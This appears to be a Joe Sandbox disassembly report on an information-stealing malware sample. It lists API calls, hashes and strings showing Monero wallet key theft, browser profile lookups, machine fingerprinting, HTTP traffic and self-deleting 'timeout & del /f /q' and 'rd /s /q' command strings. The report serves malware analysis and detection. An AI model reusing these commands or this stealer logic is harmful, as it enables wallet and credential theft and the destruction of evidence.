                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E94), ref: 004113B1
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041141B
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041143B
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00411447
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                                            • String ID: - $%s\%s$?
                                                                                                                                                                                                                            • API String ID: 2394436309-3278919252
                                                                                                                                                                                                                            • Opcode ID: 137f9a5c3c5069f07d9af57b08a0430e085017ea7b5abc5e6f1b491645986798
                                                                                                                                                                                                                            • Instruction ID: 1a7e4b7b75ff4232c8cdaa0c3999b5666d708685d756b362eb3ad491a7b64724
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 137f9a5c3c5069f07d9af57b08a0430e085017ea7b5abc5e6f1b491645986798
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A561077590022CABEF21DF15DD84ECAB7B9AB04704F1082E6A608B2161DF756FC9CF54
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004182D8
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004182E7
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182FC
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • ShellExecuteEx.SHELL32(?), ref: 00418498
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004184A7
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004184B9
                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 004184C9
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 004183D2
                                                                                                                                                                                                                            • " & rd /s /q "C:\ProgramData\, xrefs: 00418375
                                                                                                                                                                                                                            • /c timeout /t 10 & del /f /q ", xrefs: 00418327
                                                                                                                                                                                                                            • " & exit, xrefs: 004183CB
                                                                                                                                                                                                                            • " & exit, xrefs: 0041841C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                                            • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                                            • API String ID: 2823247455-1079830800
                                                                                                                                                                                                                            • Opcode ID: b071fe12343d58bb0d83dfd60e1d5a4a704574d150c09f98c2c8033b4a0eafb8
                                                                                                                                                                                                                            • Instruction ID: 1ecdbca486f6516b97744b8f32921e2a4b1c5f3f6236c6652c3ebe6830b2fc87
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b071fe12343d58bb0d83dfd60e1d5a4a704574d150c09f98c2c8033b4a0eafb8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B51CAB1E4022A9BCB11EF25DD85ADDB37CAB44708F4140EAA70873152CA786FC68F58
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109AA
                                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004109EA
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A3F
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A46
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410A7C
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,00436E44), ref: 00410A8B
                                                                                                                                                                                                                              • Part of subcall function 00411659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00411674
                                                                                                                                                                                                                              • Part of subcall function 00411659: _memset.LIBCMT ref: 004116A3
                                                                                                                                                                                                                              • Part of subcall function 00411659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116CB
                                                                                                                                                                                                                              • Part of subcall function 00411659: lstrcatA.KERNEL32(?,00436ED4,?,?,?,?,?), ref: 004116E8
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00410AA2
                                                                                                                                                                                                                              • Part of subcall function 004123AA: malloc.MSVCRT ref: 004123AF
                                                                                                                                                                                                                              • Part of subcall function 004123AA: strncpy.MSVCRT ref: 004123C0
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AC5
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                            • String ID: :\$C$QuBi$bwA
                                                                                                                                                                                                                            • API String ID: 1856320939-1665024704
                                                                                                                                                                                                                            • Opcode ID: 10eca5ba7591b1c9726683b6efb2efe54b45c38386d2ee730406ab5f7d6ba462
                                                                                                                                                                                                                            • Instruction ID: b9c2e458b62d39f60936fb5c5f3cecbb2f8bdcade59f27643c81c3961379b96e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10eca5ba7591b1c9726683b6efb2efe54b45c38386d2ee730406ab5f7d6ba462
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0441AFB1A042289BCB259F359D85ADEBBBDEF09304F0000EAF549E3121D6748FC58F68
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                              • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                              • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                              • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041695C
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00416967
                                                                                                                                                                                                                              • Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,?), ref: 0041697C
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0041698B
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 004169A4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                            • API String ID: 4174444224-1526165396
                                                                                                                                                                                                                            • Opcode ID: 1ef060e16aa293cdc7d669a91b577f2a7f92320b6147e55223d984de7ac28f78
                                                                                                                                                                                                                            • Instruction ID: 4712dda684cdb8c2e2171393cba04d1fb179912ddf7bf229b407c8c660ac4956
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ef060e16aa293cdc7d669a91b577f2a7f92320b6147e55223d984de7ac28f78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1621B6B1910215ABCB10BF35DC469DE7BA9AF04304F11502BF905E3192DB7DDA858B9D
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EACE
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB2B
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EDF2
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC08
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECB8
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED15
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                                            • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                                            • API String ID: 3722407311-2697854757
                                                                                                                                                                                                                            • Opcode ID: f2a46934acf5d197ac3ba24e214e728af1aaf9f2852ebb6af8c277c23bb41c48
                                                                                                                                                                                                                            • Instruction ID: 47194a26f9b8e0096c1e3e694baa9a640fb112bc8662c66d582230df9716c17b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2a46934acf5d197ac3ba24e214e728af1aaf9f2852ebb6af8c277c23bb41c48
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AB1A032E00109ABCF20FFAADD47B8D7771AF40314F554126FD04B7291DA78AA998BD9
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$CloseHandleHttp$Request$FileInfoOpenOptionQueryReadSend
                                                                                                                                                                                                                            • String ID: GET
                                                                                                                                                                                                                            • API String ID: 2558249038-1805413626
                                                                                                                                                                                                                            • Opcode ID: 632edca03fab61acc8589b3240ddeb41ca39c09e9b0f6479f3d81475db8c834b
                                                                                                                                                                                                                            • Instruction ID: eb7df55b02a43638787ffbf0181485d754e4229e0423021ba31686d85308d6c6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 632edca03fab61acc8589b3240ddeb41ca39c09e9b0f6479f3d81475db8c834b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA4105759009289FDF249F50DD85BEFBBB9EF08306F0011E6E909A22A0DA755FC18F55
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00401ADC
                                                                                                                                                                                                                              • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                                                                              • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                                                                              • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                                                                              • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                                                                              • Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00401C9D
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                                            • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                                            • API String ID: 615783205-3586502688
                                                                                                                                                                                                                            • Opcode ID: 87c923612c89c0a7c1b2bcbbf18e619cf5408806aee1e9d578336ebb433b6e5c
                                                                                                                                                                                                                            • Instruction ID: 6f92dde0959b71e6213efb4dedd1dcdc38b1d1e79667daa33b59108eaaa6e09e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87c923612c89c0a7c1b2bcbbf18e619cf5408806aee1e9d578336ebb433b6e5c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0510AB1E4012D9BCB21EB25DD466DD7779AF04308F4050BAA608B3192DA78AFC98F48
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB27
                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB53
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040FB96
                                                                                                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FCEC
                                                                                                                                                                                                                              • Part of subcall function 0040F005: _memmove.LIBCMT ref: 0040F01F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: OpenProcess_memmove_memset
                                                                                                                                                                                                                            • String ID: N0ZWFt
                                                                                                                                                                                                                            • API String ID: 2647191932-431618156
                                                                                                                                                                                                                            • Opcode ID: 898c51137a7cc0ead4e363bda5b9ea1602847eab9fbb75ffd378713a9d89c653
                                                                                                                                                                                                                            • Instruction ID: 20d42e2015e456c1747424349194f0c6a0577cf11073bf2f021c8e6848fe4d5e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 898c51137a7cc0ead4e363bda5b9ea1602847eab9fbb75ffd378713a9d89c653
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B75182B1D0022C9BDB309F14DC85AEDB7B9AB44304F0001FAA609B7592DB796E88CF59
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004156E4
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 00415704
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 0041572A
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00415736
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415765
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415778
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                                            • String ID: `zA
                                                                                                                                                                                                                            • API String ID: 3891774339-1671295560
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                            • LocalFree.KERNEL32(0040EC91,?,?,?,?,0040E72B,?,?,?), ref: 0040802B
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                            • String ID: +@
                                                                                                                                                                                                                            • API String ID: 2311089104-396005422
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004115DC
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 004115FB
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00411620
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?), ref: 0041162C
                                                                                                                                                                                                                            • CharToOemA.USER32(?,?), ref: 00411640
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                            • API String ID: 2235053359-1211650757
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • wallet_path, xrefs: 00401A9C
                                                                                                                                                                                                                            • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                                                            • API String ID: 3466090806-4244082812
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415EC8
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00415EE5
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415F04
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415F18
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415F2B
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415F3F
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415F52
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00411D67: GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E
                                                                                                                                                                                                                              • Part of subcall function 00415B4D: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B72
